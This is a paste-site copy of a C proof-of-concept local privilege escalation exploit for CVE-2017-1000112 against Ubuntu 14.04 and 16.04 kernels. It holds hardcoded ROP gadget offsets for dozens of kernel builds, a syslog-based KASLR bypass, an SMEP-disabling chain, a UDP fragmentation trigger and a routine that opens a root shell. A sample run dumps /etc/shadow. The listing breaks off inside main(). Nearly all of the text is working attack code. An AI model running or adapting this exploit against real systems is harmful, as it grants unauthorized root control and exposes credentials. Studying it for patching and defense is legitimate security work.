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AZZATSSINS_CYBERSERK

Linux Kernel < 4.4.0-83 / < 4.8.0-58 Ubuntu 14.04 and 16.04 Local Privilege Escalation

Mar 10th, 2018
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  1. // A proof-of-concept local root exploit for CVE-2017-1000112.
  2. // Includes KASLR and SMEP bypasses. No SMAP bypass.
  3. // Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.
  4. //
  5. // Usage:
  6. // user@ubuntu:~$ uname -a
  7. // Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
  8. // user@ubuntu:~$ whoami
  9. // user
  10. // user@ubuntu:~$ id
  11. // uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
  12. // user@ubuntu:~$ gcc pwn.c -o pwn
  13. // user@ubuntu:~$ ./pwn
  14. // [.] starting
  15. // [.] checking distro and kernel versions
  16. // [.] kernel version '4.8.0-58-generic' detected
  17. // [~] done, versions looks good
  18. // [.] checking SMEP and SMAP
  19. // [~] done, looks good
  20. // [.] setting up namespace sandbox
  21. // [~] done, namespace sandbox set up
  22. // [.] KASLR bypass enabled, getting kernel addr
  23. // [~] done, kernel text:   ffffffffae400000
  24. // [.] commit_creds:        ffffffffae4a5d20
  25. // [.] prepare_kernel_cred: ffffffffae4a6110
  26. // [.] SMEP bypass enabled, mmapping fake stack
  27. // [~] done, fake stack mmapped
  28. // [.] executing payload ffffffffae40008d
  29. // [~] done, should be root now
  30. // [.] checking if we got root
  31. // [+] got r00t ^_^
  32. // root@ubuntu:/home/user# whoami
  33. // root
  34. // root@ubuntu:/home/user# id
  35. // uid=0(root) gid=0(root) groups=0(root)
  36. // root@ubuntu:/home/user# cat /etc/shadow
  37. // root:!:17246:0:99999:7:::
  38. // daemon:*:17212:0:99999:7:::
  39. // bin:*:17212:0:99999:7:::
  40. // sys:*:17212:0:99999:7:::
  41. // ...
  42. //
  43. // EDB Note: Details ~ http://www.openwall.com/lists/oss-security/2017/08/13/1
  44. //
  45. // Andrey Konovalov <andreyknvl@gmail.com>
  46. #define _GNU_SOURCE
  47. #include <assert.h>
  48. #include <errno.h>
  49. #include <fcntl.h>
  50. #include <sched.h>
  51. #include <stdarg.h>
  52. #include <stdbool.h>
  53. #include <stdint.h>
  54. #include <stdio.h>
  55. #include <stdlib.h>
  56. #include <string.h>
  57. #include <unistd.h>
  58. #include <linux/socket.h>
  59. #include <netinet/ip.h>
  60. #include <sys/klog.h>
  61. #include <sys/mman.h>
  62. #include <sys/utsname.h>
  63. #define ENABLE_KASLR_BYPASS 1
  64. #define ENABLE_SMEP_BYPASS 1
  65. // Will be overwritten if ENABLE_KASLR_BYPASS is enabled.
  66. unsigned long KERNEL_BASE = 0xffffffff81000000ul;
  67. // Will be overwritten by detect_versions().
  68. int kernel = -1;
  69. struct kernel_info {
  70. const char* distro;
  71. const char* version;
  72. uint64_t commit_creds;
  73. uint64_t prepare_kernel_cred;
  74. uint64_t xchg_eax_esp_ret;
  75. uint64_t pop_rdi_ret;
  76. uint64_t mov_dword_ptr_rdi_eax_ret;
  77. uint64_t mov_rax_cr4_ret;
  78. uint64_t neg_rax_ret;
  79. uint64_t pop_rcx_ret;
  80. uint64_t or_rax_rcx_ret;
  81. uint64_t xchg_eax_edi_ret;
  82. uint64_t mov_cr4_rdi_ret;
  83. uint64_t jmp_rcx;
  84. };
  85. struct kernel_info kernels[] = {
  86. { "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },
  87. { "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },
  88. { "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
  89. { "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
  90. { "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
  91. { "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },
  92. { "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },
  93. { "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },
  94. { "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
  95. { "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
  96. { "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },
  97. { "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
  98. { "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
  99. { "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  100. { "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  101. { "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  102. { "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  103. { "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  104. { "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
  105. { "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  106. { "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  107. { "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  108. { "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  109. { "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  110. { "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
  111. { "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },
  112. { "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },
  113. { "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
  114. { "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
  115. { "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
  116. { "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
  117. { "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
  118. { "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },
  119. { "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
  120. { "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
  121. { "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
  122. { "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
  123. { "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
  124. { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
  125. };
  126. // Used to get root privileges.
  127. #define COMMIT_CREDS (KERNEL_BASE + kernels[kernel].commit_creds)
  128. #define PREPARE_KERNEL_CRED (KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
  129. // Used when ENABLE_SMEP_BYPASS is used.
  130. // - xchg eax, esp ; ret
  131. // - pop rdi ; ret
  132. // - mov dword ptr [rdi], eax ; ret
  133. // - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret
  134. // - neg rax ; ret
  135. // - pop rcx ; ret
  136. // - or rax, rcx ; ret
  137. // - xchg eax, edi ; ret
  138. // - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret
  139. // - jmp rcx
  140. #define XCHG_EAX_ESP_RET (KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)
  141. #define POP_RDI_RET (KERNEL_BASE + kernels[kernel].pop_rdi_ret)
  142. #define MOV_DWORD_PTR_RDI_EAX_RET (KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)
  143. #define MOV_RAX_CR4_RET (KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)
  144. #define NEG_RAX_RET (KERNEL_BASE + kernels[kernel].neg_rax_ret)
  145. #define POP_RCX_RET (KERNEL_BASE + kernels[kernel].pop_rcx_ret)
  146. #define OR_RAX_RCX_RET (KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)
  147. #define XCHG_EAX_EDI_RET (KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)
  148. #define MOV_CR4_RDI_RET (KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)
  149. #define JMP_RCX (KERNEL_BASE + kernels[kernel].jmp_rcx)
  150. // * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
  151. typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
  152. typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
  153. void get_root(void) {
  154. ((_commit_creds)(COMMIT_CREDS))(
  155.     ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));
  156. }
  157. // * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *
  158. uint64_t saved_esp;
  159. // Unfortunately GCC does not support `__atribute__((naked))` on x86, which
  160. // can be used to omit a function's prologue, so I had to use this weird
  161. // wrapper hack as a workaround. Note: Clang does support it, which means it
  162. // has better support of GCC attributes than GCC itself. Funny.
  163. void wrapper() {
  164. asm volatile (" \n\
  165. payload: \n\
  166. movq %%rbp, %%rax \n\
  167. movq $0xffffffff00000000, %%rdx \n\
  168. andq %%rdx, %%rax \n\
  169. movq %0, %%rdx \n\
  170. addq %%rdx, %%rax \n\
  171. movq %%rax, %%rsp \n\
  172. call get_root \n\
  173. ret \n\
  174. " : : "m"(saved_esp) : );
  175. }
  176. void payload();
  177. #define CHAIN_SAVE_ESP \
  178. *stack++ = POP_RDI_RET; \
  179. *stack++ = (uint64_t)&saved_esp;\
  180. *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
  181. #define SMEP_MASK 0x100000
  182. #define CHAIN_DISABLE_SMEP \
  183. *stack++ = MOV_RAX_CR4_RET; \
  184. *stack++ = NEG_RAX_RET; \
  185. *stack++ = POP_RCX_RET; \
  186. *stack++ = SMEP_MASK; \
  187. *stack++ = OR_RAX_RCX_RET; \
  188. *stack++ = NEG_RAX_RET; \
  189. *stack++ = XCHG_EAX_EDI_RET; \
  190. *stack++ = MOV_CR4_RDI_RET;
  191. #define CHAIN_JMP_PAYLOAD                     \
  192. *stack++ = POP_RCX_RET;               \
  193. *stack++ = (uint64_t)&payload;        \
  194. *stack++ = JMP_RCX;
  195. void mmap_stack() {
  196. uint64_t stack_aligned, stack_addr;
  197. int page_size, stack_size, stack_offset;
  198. uint64_t* stack;
  199. page_size = getpagesize();
  200. stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);
  201. stack_addr = stack_aligned - page_size * 4;
  202. stack_size = page_size * 8;
  203. stack_offset = XCHG_EAX_ESP_RET % page_size;
  204. stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,
  205. MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  206. if (stack == MAP_FAILED || stack != (void*)stack_addr) {
  207. perror("[-] mmap()");
  208. exit(EXIT_FAILURE);
  209. }
  210. stack = (uint64_t*)((char*)stack_aligned + stack_offset);
  211. CHAIN_SAVE_ESP;
  212. CHAIN_DISABLE_SMEP;
  213. CHAIN_JMP_PAYLOAD;
  214. }
  215. // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
  216. #define SYSLOG_ACTION_READ_ALL 3
  217. #define SYSLOG_ACTION_SIZE_BUFFER 10
  218. void mmap_syslog(char** buffer, int* size) {
  219. *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
  220. if (*size == -1) {
  221. perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
  222. exit(EXIT_FAILURE);
  223. }
  224. *size = (*size / getpagesize() + 1) * getpagesize();
  225. *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
  226. MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  227. *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
  228. if (*size == -1) {
  229. perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
  230. exit(EXIT_FAILURE);
  231. }
  232. }
  233. unsigned long get_kernel_addr_trusty(char* buffer, int size) {
  234. const char* needle1 = "Freeing unused";
  235. char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
  236. if (substr == NULL) {
  237. fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1);
  238. exit(EXIT_FAILURE);
  239. }
  240. int start = 0;
  241. int end = 0;
  242. for (end = start; substr[end] != '-'; end++);
  243. const char* needle2 = "ffffff";
  244. substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
  245. if (substr == NULL) {
  246. fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2);
  247. exit(EXIT_FAILURE);
  248. }
  249. char* endptr = &substr[16];
  250. unsigned long r = strtoul(&substr[0], &endptr, 16);
  251. r &= 0xffffffffff000000ul;
  252. return r;
  253. }
  254. unsigned long get_kernel_addr_xenial(char* buffer, int size) {
  255. const char* needle1 = "Freeing unused";
  256. char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
  257. if (substr == NULL) {
  258. fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1);
  259. exit(EXIT_FAILURE);
  260. }
  261. int start = 0;
  262. int end = 0;
  263. for (start = 0; substr[start] != '-'; start++);
  264. for (end = start; substr[end] != '\n'; end++);
  265. const char* needle2 = "ffffff";
  266. substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
  267. if (substr == NULL) {
  268. fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2);
  269. exit(EXIT_FAILURE);
  270. }
  271. char* endptr = &substr[16];
  272. unsigned long r = strtoul(&substr[0], &endptr, 16);
  273. r &= 0xfffffffffff00000ul;
  274. r -= 0x1000000ul;
  275. return r;
  276. }
  277. unsigned long get_kernel_addr() {
  278. char* syslog;
  279. int size;
  280. mmap_syslog(&syslog, &size);
  281. if (strcmp("trusty", kernels[kernel].distro) == 0 &&
  282.     strncmp("4.4.0", kernels[kernel].version, 5) == 0)
  283. return get_kernel_addr_trusty(syslog, size);
  284. if (strcmp("xenial", kernels[kernel].distro) == 0 &&
  285.     strncmp("4.8.0", kernels[kernel].version, 5) == 0)
  286. return get_kernel_addr_xenial(syslog, size);
  287. printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*");
  288. exit(EXIT_FAILURE);
  289. }
  290. // * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
  291. struct ubuf_info {
  292. uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
  293. uint64_t ctx; // void *
  294. uint64_t desc; // unsigned long
  295. };
  296. struct skb_shared_info {
  297. uint8_t nr_frags; // unsigned char
  298. uint8_t tx_flags; // __u8
  299. uint16_t gso_size; // unsigned short
  300. uint16_t gso_segs; // unsigned short
  301. uint16_t gso_type; // unsigned short
  302. uint64_t frag_list; // struct sk_buff *
  303. uint64_t hwtstamps; // struct skb_shared_hwtstamps
  304. uint32_t tskey; // u32
  305. uint32_t ip6_frag_id; // __be32
  306. uint32_t dataref; // atomic_t
  307. uint64_t destructor_arg; // void *
  308. uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
  309. };
  310. struct ubuf_info ui;
  311. void init_skb_buffer(char* buffer, unsigned long func) {
  312. struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;
  313. memset(ssi, 0, sizeof(*ssi));
  314. ssi->tx_flags = 0xff;
  315. ssi->destructor_arg = (uint64_t)&ui;
  316. ssi->nr_frags = 0;
  317. ssi->frag_list = 0;
  318. ui.callback = func;
  319. }
  320. // * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
  321. #define SHINFO_OFFSET 3164
  322. void oob_execute(unsigned long payload) {
  323. char buffer[4096];
  324. memset(&buffer[0], 0x42, 4096);
  325. init_skb_buffer(&buffer[SHINFO_OFFSET], payload);
  326. int s = socket(PF_INET, SOCK_DGRAM, 0);
  327. if (s == -1) {
  328. perror("[-] socket()");
  329. exit(EXIT_FAILURE);
  330. }
  331. struct sockaddr_in addr;
  332. memset(&addr, 0, sizeof(addr));
  333. addr.sin_family = AF_INET;
  334. addr.sin_port = htons(8000);
  335. addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
  336. if (connect(s, (void*)&addr, sizeof(addr))) {
  337. perror("[-] connect()");
  338. exit(EXIT_FAILURE);
  339. }
  340. int size = SHINFO_OFFSET + sizeof(struct skb_shared_info);
  341. int rv = send(s, buffer, size, MSG_MORE);
  342. if (rv != size) {
  343. perror("[-] send()");
  344. exit(EXIT_FAILURE);
  345. }
  346. int val = 1;
  347. rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
  348. if (rv != 0) {
  349. perror("[-] setsockopt(SO_NO_CHECK)");
  350. exit(EXIT_FAILURE);
  351. }
  352. send(s, buffer, 1, 0);
  353. close(s);
  354. }
  355. // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
  356. #define CHUNK_SIZE 1024
  357. int read_file(const char* file, char* buffer, int max_length) {
  358. int f = open(file, O_RDONLY);
  359. if (f == -1)
  360. return -1;
  361. int bytes_read = 0;
  362. while (true) {
  363. int bytes_to_read = CHUNK_SIZE;
  364. if (bytes_to_read > max_length - bytes_read)
  365. bytes_to_read = max_length - bytes_read;
  366. int rv = read(f, &buffer[bytes_read], bytes_to_read);
  367. if (rv == -1)
  368. return -1;
  369. bytes_read += rv;
  370. if (rv == 0)
  371. return bytes_read;
  372. }
  373. }
  374. #define LSB_RELEASE_LENGTH 1024
  375. void get_distro_codename(char* output, int max_length) {
  376. char buffer[LSB_RELEASE_LENGTH];
  377. int length = read_file("/etc/lsb-release", &buffer[0], LSB_RELEASE_LENGTH);
  378. if (length == -1) {
  379. perror("[-] open/read(/etc/lsb-release)");
  380. exit(EXIT_FAILURE);
  381. }
  382. const char *needle = "DISTRIB_CODENAME=";
  383. int needle_length = strlen(needle);
  384. char* found = memmem(&buffer[0], length, needle, needle_length);
  385. if (found == NULL) {
  386. printf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n");
  387. exit(EXIT_FAILURE);
  388. }
  389. int i;
  390. for (i = 0; found[needle_length + i] != '\n'; i++) {
  391. assert(i < max_length);
  392. assert((found - &buffer[0]) + needle_length + i < length);
  393. output[i] = found[needle_length + i];
  394. }
  395. }
  396. void get_kernel_version(char* output, int max_length) {
  397. struct utsname u;
  398. int rv = uname(&u);
  399. if (rv != 0) {
  400. perror("[-] uname())");
  401. exit(EXIT_FAILURE);
  402. }
  403. assert(strlen(u.release) <= max_length);
  404. strcpy(&output[0], u.release);
  405. }
  406. #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
  407. #define DISTRO_CODENAME_LENGTH 32
  408. #define KERNEL_VERSION_LENGTH 32
  409. void detect_versions() {
  410. char codename[DISTRO_CODENAME_LENGTH];
  411. char version[KERNEL_VERSION_LENGTH];
  412. get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);
  413. get_kernel_version(&version[0], KERNEL_VERSION_LENGTH);
  414. int i;
  415. for (i = 0; i < ARRAY_SIZE(kernels); i++) {
  416. if (strcmp(&codename[0], kernels[i].distro) == 0 &&
  417.     strcmp(&version[0], kernels[i].version) == 0) {
  418. printf("[.] kernel version '%s' detected\n", kernels[i].version);
  419. kernel = i;
  420. return;
  421. }
  422. }
  423. printf("[-] kernel version not recognized\n");
  424. exit(EXIT_FAILURE);
  425. }
  426. #define PROC_CPUINFO_LENGTH 4096
  427. // 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
  428. int smap_smep_enabled() {
  429. char buffer[PROC_CPUINFO_LENGTH];
  430. int length = read_file("/proc/cpuinfo", &buffer[0], PROC_CPUINFO_LENGTH);
  431. if (length == -1) {
  432. perror("[-] open/read(/proc/cpuinfo)");
  433. exit(EXIT_FAILURE);
  434. }
  435. int rv = 0;
  436. char* found = memmem(&buffer[0], length, "smep", 4);
  437. if (found != NULL)
  438. rv += 1;
  439. found = memmem(&buffer[0], length, "smap", 4);
  440. if (found != NULL)
  441. rv += 2;
  442. return rv;
  443. }
  444. void check_smep_smap() {
  445. int rv = smap_smep_enabled();
  446. if (rv >= 2) {
  447. printf("[-] SMAP detected, no bypass available\n");
  448. exit(EXIT_FAILURE);
  449. }
  450. #if !ENABLE_SMEP_BYPASS
  451. if (rv >= 1) {
  452. printf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n");
  453. exit(EXIT_FAILURE);
  454. }
  455. #endif
  456. }
  457. // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
  458. static bool write_file(const char* file, const char* what, ...) {
  459. char buf[1024];
  460. va_list args;
  461. va_start(args, what);
  462. vsnprintf(buf, sizeof(buf), what, args);
  463. va_end(args);
  464. buf[sizeof(buf) - 1] = 0;
  465. int len = strlen(buf);
  466. int fd = open(file, O_WRONLY | O_CLOEXEC);
  467. if (fd == -1)
  468. return false;
  469. if (write(fd, buf, len) != len) {
  470. close(fd);
  471. return false;
  472. }
  473. close(fd);
  474. return true;
  475. }
  476. void setup_sandbox() {
  477. int real_uid = getuid();
  478. int real_gid = getgid();
  479. if (unshare(CLONE_NEWUSER) != 0) {
  480. printf("[!] unprivileged user namespaces are not available\n");
  481. perror("[-] unshare(CLONE_NEWUSER)");
  482. exit(EXIT_FAILURE);
  483. }
  484. if (unshare(CLONE_NEWNET) != 0) {
  485. perror("[-] unshare(CLONE_NEWUSER)");
  486. exit(EXIT_FAILURE);
  487. }
  488. if (!write_file("/proc/self/setgroups", "deny")) {
  489. perror("[-] write_file(/proc/self/set_groups)");
  490. exit(EXIT_FAILURE);
  491. }
  492. if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
  493. perror("[-] write_file(/proc/self/uid_map)");
  494. exit(EXIT_FAILURE);
  495. }
  496. if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
  497. perror("[-] write_file(/proc/self/gid_map)");
  498. exit(EXIT_FAILURE);
  499. }
  500. cpu_set_t my_set;
  501. CPU_ZERO(&my_set);
  502. CPU_SET(0, &my_set);
  503. if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
  504. perror("[-] sched_setaffinity()");
  505. exit(EXIT_FAILURE);
  506. }
  507. if (system("/sbin/ifconfig lo mtu 1500") != 0) {
  508. perror("[-] system(/sbin/ifconfig lo mtu 1500)");
  509. exit(EXIT_FAILURE);
  510. }
  511. if (system("/sbin/ifconfig lo up") != 0) {
  512. perror("[-] system(/sbin/ifconfig lo up)");
  513. exit(EXIT_FAILURE);
  514. }
  515. }
  516. void exec_shell() {
  517. char* shell = "/bin/bash";
  518. char* args[] = {shell, "-i", NULL};
  519. execve(shell, args, NULL);
  520. }
  521. bool is_root() {
  522. // We can't simple check uid, since we're running inside a namespace
  523. // with uid set to 0. Try opening /etc/shadow instead.
  524. int fd = open("/etc/shadow", O_RDONLY);
  525. if (fd == -1)
  526. return false;
  527. close(fd);
  528. return true;
  529. }
  530. void check_root() {
  531. printf("[.] checking if we got root\n");
  532. if (!is_root()) {
  533. printf("[-] something went wrong =(\n");
  534. return;
  535. }
  536. printf("[+] got r00t ^_^\n");
  537. exec_shell();
  538. }
  539. int main(int argc, char** argv) {
  540. printf("[.] starting\n");
  541. printf("[.] checking distro and kernel versions\n");
  542. detect_versions();
  543. printf("[~] done, versions looks good\n");
  544. printf("[.] checking SMEP and SMAP\n");
  545. check_smep_smap();
  546. printf("[~] done, looks good\n");
  547. printf("[.] setting up namespace sandbox\n");
  548. setup_sandbox();
  549. printf("[~] done, namespace sandbox set up\n");
  550. #if ENABLE_KASLR_BYPASS
  551. printf("[.] KASLR bypass enabled, getting kernel addr\n");
  552. KERNEL_BASE = get_kernel_addr();
  553. printf("[~] done, kernel text:   %lx\n", KERNEL_BASE);
  554. #endif
  555. printf("[.] commit_creds:        %lx\n", COMMIT_CREDS);
